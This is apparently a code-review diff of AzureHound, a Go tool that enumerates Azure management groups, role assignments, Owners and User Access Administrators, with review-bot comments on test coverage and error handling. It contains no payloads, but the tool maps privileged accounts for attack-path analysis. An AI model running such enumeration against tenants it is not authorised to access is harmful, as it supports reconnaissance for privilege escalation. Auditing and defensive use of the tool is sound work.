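Review bot: `TestListManagementGroupOwners` only checks that one value arrives and that the channel then closes; it never inspects the owners in the result, and the fixture holds only an Owner-role assignment, so a filter that let every role through would still pass. Add a second assignment with a different `RoleDefinitionId` and assert that the received value carries exactly one owner. `mockClient` and its `TenantInfo()` expectation are not used by `listManagementGroupOwners`, which takes no client, and can be removed. The same applies to `TestListManagementGroupUserAccessAdmins` in cmd/list-management-group-user-access-admins_test.go.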
@@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupRoleAssignmentsCmd) +} + +var listManagementGroupRoleAssignmentsCmd = &cobra.Command{ + Use: "management-group-role-assignments", + Long: "Lists Management Group Role Assignments", + Run: listManagementGroupRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure management group role assignments...") + start := time.Now() + managementGroups := listManagementGroups(ctx, azClient) + stream := listManagementGroupRoleAssignments(ctx, azClient, managementGroups) + 
panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroupRoleAssignments(ctx context.Context, client client.AzureClient, managementGroups <-chan interface{}) <-chan azureWrapper[models.ManagementGroupRoleAssignments] { + var ( + out = make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), managementGroups) { + if managementGroup, ok := result.(AzureWrapper).Data.(models.ManagementGroup); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating management group role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, managementGroup.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + managementGroupRoleAssignments = models.ManagementGroupRoleAssignments{ + ManagementGroupId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "atScope()", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this managementGroup", "managementGroupId", id) + } else { + managementGroupRoleAssignment := models.ManagementGroupRoleAssignment{ + ManagementGroupId: id, + RoleAssignment: item.Ok, + } + log.V(2).Info("found managementGroup role assignment", "managementGroupRoleAssignment", managementGroupRoleAssignment) + count++ + managementGroupRoleAssignments.RoleAssignments = append(managementGroupRoleAssignments.RoleAssignments, 
managementGroupRoleAssignment) + } + } + if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper( + enums.KindAZManagementGroupRoleAssignment, + managementGroupRoleAssignments, + )); !ok { + return + } + log.V(1).Info("finished listing managementGroup role assignments", "managementGroupId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all management group role assignments") + }() + + return out +} diff --git a/cmd/list-management-group-role-assignments_test.go b/cmd/list-management-group-role-assignments_test.go new file mode 100644 index 0000000..7f21669 --- /dev/null +++ b/cmd/list-management-group-role-assignments_test.go 
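Review bot: In the worker loop of `listManagementGroupRoleAssignments`, an `item.Error` is logged but the partially filled `managementGroupRoleAssignments` is still sent on `out`, so a management group whose listing failed looks the same downstream as one that has few or no assignments. `listManagementGroupOwners` and `listManagementGroupUserAccessAdmins` consume this channel, so their output can under-report privileged assignments with nothing in the data to mark it. If emitting partial data is intended, record it: set a `failed` flag in the error branch and add it to the closing log line, e.g. `log.V(1).Info("finished listing managementGroup role assignments", "managementGroupId", id, "count", count, "partial", failed)`.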
@@ -0,0 +1,106 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListResourceGroupRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockResourceGroupsChannel := make(chan interface{}) + mockResourceGroupRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment]) + mockResourceGroupRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockResourceGroupRoleAssignmentChannel).Times(1) + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), 
gomock.Any()).Return(mockResourceGroupRoleAssignmentChannel2).Times(1) + channel := listResourceGroupRoleAssignments(ctx, mockClient, mockResourceGroupsChannel) + + go func() { + defer close(mockResourceGroupsChannel) + mockResourceGroupsChannel <- AzureWrapper{ + Data: models.ResourceGroup{}, + } + mockResourceGroupsChannel <- AzureWrapper{ + Data: models.ResourceGroup{}, + } + }() + go func() { + defer close(mockResourceGroupRoleAssignmentChannel) + mockResourceGroupRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.ContributorRoleID, + }, + }, + } + mockResourceGroupRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + } + }() + go func() { + defer close(mockResourceGroupRoleAssignmentChannel2) + mockResourceGroupRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + } + mockResourceGroupRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 2 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 1 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } +} diff --git a/cmd/list-management-group-user-access-admins.go b/cmd/list-management-group-user-access-admins.go new file mode 100644 index 0000000..ecb4be0 --- /dev/null +++ b/cmd/list-management-group-user-access-admins.go 
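Review bot: The test added in cmd/list-management-group-role-assignments_test.go is named `TestListResourceGroupRoleAssignments` and calls `listResourceGroupRoleAssignments` with `models.ResourceGroup{}` inputs, so `listManagementGroupRoleAssignments` gets no coverage from this file. If a resource-group test of the same name exists elsewhere in package `cmd` (not visible in this part of the diff), the duplicate function name would also fail to compile. Rename it to `TestListManagementGroupRoleAssignments` and drive `listManagementGroupRoleAssignments` with `models.ManagementGroup{}` values. The last check compares against 1 but reports 2 as the wanted value; it should read `t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 1)`.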
@@ -0,0 +1,80 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupUserAccessAdminsCmd) +} + +var listManagementGroupUserAccessAdminsCmd = &cobra.Command{ + Use: "management-group-user-access-admins", + Long: "Lists Azure Management Group User Access Admins", + Run: listManagementGroupUserAccessAdminsCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure management group user access admins...") + start := time.Now() + managementGroups := listManagementGroups(ctx, azClient) + roleAssignments := listManagementGroupRoleAssignments(ctx, azClient, managementGroups) + 
panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listManagementGroupUserAccessAdmins(ctx, roleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroupUserAccessAdmins( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.ManagementGroupRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.ManagementGroupRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, mgmtGroupRoleAssignmentFilter(constants.UserAccessAdminRoleID)) + uaas := internal.Map(filteredAssignments, func(ra models.ManagementGroupRoleAssignment) models.ManagementGroupUserAccessAdmin { + return models.ManagementGroupUserAccessAdmin{ + UserAccessAdmin: ra.RoleAssignment, + ManagementGroupId: ra.ManagementGroupId, + } + }) + return NewAzureWrapper(enums.KindAZManagementGroupUserAccessAdmin, models.ManagementGroupUserAccessAdmins{ + ManagementGroupId: ra.Data.ManagementGroupId, + UserAccessAdmins: uaas, + }) + }) +} diff --git a/cmd/list-management-group-user-access-admins_test.go b/cmd/list-management-group-user-access-admins_test.go new file mode 100644 index 0000000..39c9d1b --- /dev/null +++ b/cmd/list-management-group-user-access-admins_test.go 
@@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListManagementGroupUserAccessAdmins(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listManagementGroupUserAccessAdmins(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZManagementGroupRoleAssignment, + models.ManagementGroupRoleAssignments{ + ManagementGroupId: "foo", + RoleAssignments: []models.ManagementGroupRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.UserAccessAdminRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ 
+ RoleDefinitionId: constants.UserAccessAdminRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-management-groups.go b/cmd/list-management-groups.go new file mode 100644 index 0000000..3af3019 --- /dev/null +++ b/cmd/list-management-groups.go 
@@ -0,0 +1,94 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupsCmd) +} + +var listManagementGroupsCmd = &cobra.Command{ + Use: "management-groups", + Long: "Lists Azure Active Directory Management Groups", + Run: listManagementGroupsCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory management groups...") + start := time.Now() + + stream := listManagementGroups(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func 
listManagementGroups(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureManagementGroups(ctx, "") { + if item.Error != nil { + log.Info("warning: unable to process azure management groups; either the organization has no management groups or azurehound does not have the reader role on the root management group.") + return + } else if len(config.AzMgmtGroupId.Value().([]string)) == 0 || contains(config.AzMgmtGroupId.Value().([]string), item.Ok.Name) { + log.V(2).Info("found management group", "managementGroup", item) + count++ + mgmtGroup := models.ManagementGroup{ + ManagementGroup: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + } + + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZManagementGroup, + Data: mgmtGroup, + }); !ok { + return + } + } + } + log.Info("finished listing all management groups", "count", count) + }() + + return out +} diff --git a/cmd/list-management-groups_test.go b/cmd/list-management-groups_test.go new file mode 100644 index 0000000..72f980c --- /dev/null +++ b/cmd/list-management-groups_test.go 
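Review bot: In `listManagementGroups`, the `item.Error != nil` branch discards the error: it writes a fixed Info-level message that guesses at the cause and returns, so an expired token, throttling or a network failure is reported the same way as an organization with no management groups. Every collector fed from this channel then produces empty output with nothing in the log to say why. Log the actual error, e.g. `log.Error(item.Error, "unable to continue processing azure management groups")`, and keep the reader-role hint as additional text. `config.AzMgmtGroupId.Value().([]string)` is also evaluated twice per item and could be read once before the loop.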
@@ -0,0 +1,69 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListManagementGroups(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+ mockChannel := make(chan client.AzureResult[azure.ManagementGroup])
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureManagementGroups(gomock.Any(), gomock.Any()).Return(mockChannel)
+
+ go func() {
+ defer close(mockChannel)
+ mockChannel <- client.AzureResult[azure.ManagementGroup]{
+ Ok: azure.ManagementGroup{},
+ }
+ mockChannel <- client.AzureResult[azure.ManagementGroup]{
+ Error: mockError,
+ }
+ mockChannel <- client.AzureResult[azure.ManagementGroup]{
+ Ok: azure.ManagementGroup{},
+ }
+ }()
+
+ channel := listManagementGroups(ctx, mockClient)
+ result := <-channel
+ if _, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("expected channel to close from an error result but it did not")
+ }
+}
diff --git a/cmd/list-resource-group-owners.go b/cmd/list-resource-group-owners.go
new file mode 100644
index 0000000..e049501
--- /dev/null
+++ b/cmd/list-resource-group-owners.go
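Review bot: The producer goroutine in TestListManagementGroups can never finish: `mockChannel` is unbuffered and listManagementGroups returns as soon as it sees the error item, so the third send blocks forever and the deferred `close(mockChannel)` never runs. Giving the channel room for all three items, `mockChannel := make(chan client.AzureResult[azure.ManagementGroup], 3)`, lets the goroutine exit and still exercises the early return. The same early return in production code leaves the upstream producer undrained, which is only safe if that producer stops on context cancellation; that cannot be confirmed from this hunk.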
@@ -0,0 +1,83 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listResourceGroupOwnersCmd)
+}
+
+var listResourceGroupOwnersCmd = &cobra.Command{
+ Use: "resource-group-owners",
+ Long: "Lists Azure Resource Group Owners",
+ Run: listResourceGroupOwnersCmdImpl,
+ SilenceUsage: true,
+}
+
+func listResourceGroupOwnersCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure resource group owners...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ resourceGroups := listResourceGroups(ctx, azClient, subscriptions)
+ roleAssignments := listResourceGroupRoleAssignments(ctx, azClient, resourceGroups)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listResourceGroupOwners(ctx, roleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listResourceGroupOwners(
+ ctx context.Context,
+ roleAssignments <-chan azureWrapper[models.ResourceGroupRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.ResourceGroupRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, rgRoleAssignmentFilter(constants.OwnerRoleID))
+
+ owners := internal.Map(filteredAssignments, func(ra models.ResourceGroupRoleAssignment) models.ResourceGroupOwner {
+ return models.ResourceGroupOwner{
+ Owner: ra.RoleAssignment,
+ ResourceGroupId: ra.ResourceGroupId,
+ }
+ })
+
+ return NewAzureWrapper(enums.KindAZResourceGroupOwner, models.ResourceGroupOwners{
+ ResourceGroupId: ra.Data.ResourceGroupId,
+ Owners: owners,
+ })
+ })
+}
diff --git a/cmd/list-resource-group-owners_test.go b/cmd/list-resource-group-owners_test.go
new file mode 100644
index 0000000..b580683
--- /dev/null
+++ b/cmd/list-resource-group-owners_test.go
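Review bot: The inner closure in listResourceGroupOwners reuses the name `ra` for a single `models.ResourceGroupRoleAssignment`, shadowing the outer `ra` that holds the whole wrapper, so `ra.ResourceGroupId` and `ra.Data.ResourceGroupId` a few lines apart refer to different values. Renaming the inner parameter, `func(assignment models.ResourceGroupRoleAssignment) models.ResourceGroupOwner`, removes the ambiguity. listResourceGroupUserAccessAdmins has the same shadowing.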
@@ -0,0 +1,76 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListResourceGroupOwners(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockRoleAssignmentsChannel := make(chan azureWrapper[models.ResourceGroupRoleAssignments])
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listResourceGroupOwners(ctx, mockRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockRoleAssignmentsChannel)
+
+ mockRoleAssignmentsChannel <- NewAzureWrapper(
+ enums.KindAZResourceGroupRoleAssignment,
+ models.ResourceGroupRoleAssignments{
+ ResourceGroupId: "foo",
+ RoleAssignments: []models.ResourceGroupRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.OwnerRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.OwnerRoleID,
+ },
+ },
+ },
+ },
+ },
+ )
+ }()
+
+ if _, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-resource-group-role-assignments.go b/cmd/list-resource-group-role-assignments.go
new file mode 100644
index 0000000..5d89a56
--- /dev/null
+++ b/cmd/list-resource-group-role-assignments.go
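Review bot: TestListResourceGroupOwners only checks that one value arrives on the channel, and listResourceGroupOwners appears to emit a wrapper for every input even when the filter matches nothing, so the test passes whether or not the Owner assignment is selected. Assert on the content instead, for example `owners := result.(azureWrapper[models.ResourceGroupOwners]).Data.Owners` followed by a check that its length is 1 (the concrete type is inferred from the `NewAzureWrapper` call in the command file; confirm). TestListResourceGroupUserAccessAdmins in list-resource-group-user-access-admins_test.go has the same shape. The `mockClient` and `TenantInfo` expectation are unused here, since the function under test takes no client.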
@@ -0,0 +1,130 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listResourceGroupRoleAssignmentsCmd)
+}
+
+var listResourceGroupRoleAssignmentsCmd = &cobra.Command{
+ Use: "resource-group-role-assignments",
+ Long: "Lists Resource Group Role Assignments",
+ Run: listResourceGroupRoleAssignmentsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listResourceGroupRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure resource group role assignments...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ resourceGroups := listResourceGroups(ctx, azClient, subscriptions)
+ stream := listResourceGroupRoleAssignments(ctx, azClient, resourceGroups)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listResourceGroupRoleAssignments(ctx context.Context, client client.AzureClient, resourceGroups <-chan interface{}) <-chan azureWrapper[models.ResourceGroupRoleAssignments] {
+ var (
+ out = make(chan azureWrapper[models.ResourceGroupRoleAssignments])
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), resourceGroups) {
+ if resourceGroup, ok := result.(AzureWrapper).Data.(models.ResourceGroup); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating resource group role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, resourceGroup.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ resourceGroupRoleAssignments = models.ResourceGroupRoleAssignments{
+ ResourceGroupId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this resourceGroup", "resourceGroupId", id)
+ } else {
+ resourceGroupRoleAssignment := models.ResourceGroupRoleAssignment{
+ ResourceGroupId: id,
+ RoleAssignment: item.Ok,
+ }
